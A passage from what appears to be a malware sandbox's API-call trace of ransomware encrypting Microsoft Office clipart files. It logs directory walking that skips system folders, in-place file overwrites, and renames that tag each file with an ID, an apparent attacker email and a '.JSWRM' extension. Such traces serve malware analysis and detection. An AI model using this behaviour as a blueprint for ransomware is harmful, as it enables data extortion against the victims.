(HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0088.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0088.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0088.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0088.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0088.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.417] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238333.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238333.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0088.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.417] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1334, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0238927.WMF", cAlternateFileName="")) returned 1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2=".") returned 1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2="..") returned 1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2="...") returned 1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2="windows") returned -1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2="recovery") returned -1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2="perflogs") returned -1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2="documents and settings") returned 1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2="system volume information") returned -1 [0088.418] lstrcmpiW (lpString1="J0238927.WMF", lpString2="msocache") returned -1 [0088.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0088.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238927.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238927.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0238927.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0088.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238927.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238927.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0238927.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238927.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.419] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4916) returned 1 [0088.419] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1330) returned 0x205850 [0088.419] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1330, lpOverlapped=0x0) returned 1 [0088.422] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.422] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1330, lpOverlapped=0x0) returned 1 [0088.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.422] CloseHandle (hObject=0x314) returned 1 [0088.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0088.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0088.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0088.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0088.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0088.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.422] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238927.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238927.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0088.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.423] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d3c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0238959.WMF", cAlternateFileName="")) returned 1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2=".") returned 1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2="..") returned 1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2="...") returned 1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2="windows") returned -1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2="recovery") returned -1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2="perflogs") returned -1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2="documents and settings") returned 1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2="system volume information") returned -1 [0088.423] lstrcmpiW (lpString1="J0238959.WMF", lpString2="msocache") returned -1 [0088.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238959.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238959.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0238959.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238959.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238959.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0238959.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238959.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.424] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7484) returned 1 [0088.424] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d30) returned 0x205850 [0088.424] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d30, lpOverlapped=0x0) returned 1 [0088.426] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.426] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d30, lpOverlapped=0x0) returned 1 [0088.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.426] CloseHandle (hObject=0x314) returned 1 [0088.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0088.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0088.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0088.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0088.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0088.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0088.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.427] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238959.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238959.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0088.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0088.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.428] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0238983.WMF", cAlternateFileName="")) returned 1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2=".") returned 1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2="..") returned 1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2="...") returned 1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2="windows") returned -1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2="recovery") returned -1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2="perflogs") returned -1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2="documents and settings") returned 1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2="system volume information") returned -1 [0088.428] lstrcmpiW (lpString1="J0238983.WMF", lpString2="msocache") returned -1 [0088.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238983.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238983.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0238983.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0088.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238983.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238983.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0238983.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0088.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0088.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238983.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.429] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5048) returned 1 [0088.429] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13b0) returned 0x205850 [0088.429] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x13b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x13b0, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.431] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x13b0, lpOverlapped=0x0) returned 1 [0088.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.431] CloseHandle (hObject=0x314) returned 1 [0088.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0088.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0088.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0088.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0088.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.432] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238983.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238983.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0088.432] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1284, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239057.WMF", cAlternateFileName="")) returned 1 [0088.432] lstrcmpiW (lpString1="J0239057.WMF", lpString2=".") returned 